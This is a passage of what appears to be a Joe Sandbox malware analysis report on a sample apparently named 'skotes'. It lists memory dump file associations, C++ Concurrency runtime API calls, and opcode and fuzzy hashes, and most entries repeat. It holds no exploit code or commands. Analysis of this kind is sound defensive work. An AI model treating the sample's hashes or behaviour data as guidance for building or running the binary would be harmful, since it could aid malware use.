                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 2943730970-3887548279
                                                                                                                                            • Opcode ID: c181a93729d668863be5569e830c28fe451ed65fef0b90453bdf7bda5fdddd86
                                                                                                                                            • Instruction ID: 6992f260d961cfbd2f00eb353688d2ede2fb9cc565bec5e646bfa5aa44864968
                                                                                                                                            • Opcode Fuzzy Hash: c181a93729d668863be5569e830c28fe451ed65fef0b90453bdf7bda5fdddd86
                                                                                                                                            • Instruction Fuzzy Hash: E8B16BB0A00655EFDB28CF6AD981B7AB7B5FF48300F14816DE905AB281D770AD91CB90
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00AE2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00AE2D0F
                                                                                                                                            • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00AE1614
                                                                                                                                              • Part of subcall function 00AE2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00AE2E39
                                                                                                                                              • Part of subcall function 00AE2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00AE2EA8
                                                                                                                                            • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00AE1746
                                                                                                                                            • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00AE17A6
                                                                                                                                            • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00AE17B2
                                                                                                                                            • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00AE17ED
                                                                                                                                            • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00AE180E
                                                                                                                                            • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00AE181A
                                                                                                                                            • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00AE1823
                                                                                                                                            • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00AE183B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2508902052-0
                                                                                                                                            • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                            • Instruction ID: 3a51de99d52f9bb6910d5c241c0e5a3eba105ff090b8579da216d28ac8ca3696
                                                                                                                                            • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                            • Instruction Fuzzy Hash: 08816A71E002659FCB18DFAAC580A6DBBF6FF48704B2546ADE445AB701C770AD52CB84
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00AEEC81
                                                                                                                                              • Part of subcall function 00AE8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00AE8F50
                                                                                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00AEECE7
                                                                                                                                            • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00AEECFF
                                                                                                                                            • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00AEED0C
                                                                                                                                              • Part of subcall function 00AEE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00AEE7D7
                                                                                                                                              • Part of subcall function 00AEE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00AEE86F
                                                                                                                                              • Part of subcall function 00AEE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00AEE879
                                                                                                                                              • Part of subcall function 00AEE7AF: Concurrency::location::_Assign.LIBCMT ref: 00AEE8AD
                                                                                                                                              • Part of subcall function 00AEE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00AEE8B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2363638799-0
                                                                                                                                            • Opcode ID: db9c5b790fa6f25eb31a20a84b7de10a7ea915b46769138c9955745a087aa122
                                                                                                                                            • Instruction ID: 4e729f263e5e753d960b6359af178d200b4879b02886e961ff7a4bc262039ea7
                                                                                                                                            • Opcode Fuzzy Hash: db9c5b790fa6f25eb31a20a84b7de10a7ea915b46769138c9955745a087aa122
                                                                                                                                            • Instruction Fuzzy Hash: B751AF31A00245DBCF24EF65CD95BAEB775EF44310F1480A9E9067B392CBB0AE45CBA1
                                                                                                                                            APIs
                                                                                                                                            • NtFlushProcessWriteBuffers.NTDLL ref: 00ADCBAA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BuffersFlushProcessWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2982998374-0
                                                                                                                                            • Opcode ID: 4c983c16c24a309028c51665546866e3ae1d1fc641430dedeb62d052b1f6dcc6
                                                                                                                                            • Instruction ID: a067fb35f0fedb263deba82e49372a972bfe389077f61c5fbf36e97896bfcef8
                                                                                                                                            • Opcode Fuzzy Hash: 4c983c16c24a309028c51665546866e3ae1d1fc641430dedeb62d052b1f6dcc6
                                                                                                                                            • Instruction Fuzzy Hash: 01B09232A2383047CA622B14BC089AD77149A80E3138A4157D802A7224CEA05EC38BD4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
